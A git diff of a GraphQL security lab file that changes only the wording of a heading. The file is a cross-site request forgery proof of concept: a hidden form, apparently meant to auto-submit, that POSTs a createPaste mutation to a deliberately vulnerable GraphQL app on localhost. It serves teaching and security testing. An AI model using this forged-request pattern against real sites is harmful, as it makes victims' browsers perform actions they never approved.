--- a/ch09/post_csrf_submit.html
+++ b/ch09/post_csrf_submit.html
@@ -1,6 +1,6 @@
 <!-- Ensure your DVGA is set to port 5013 on localhost! -->
 <html>
-  <h1>Click on the button below to see the proof of concept!</h1>
+  <h1>Click the button below to see the proof of concept!</h1>
   <body>
      <form id="auto_submit_form" method="POST" action="http://localhost:5013/graphql">
        <input type="hidden" name="query" value="mutation { createPaste(title:&quot;CSRF&quot;, content:&quot;content&quot;, public:true, burn: false) { paste { id content title burn } }}"/>
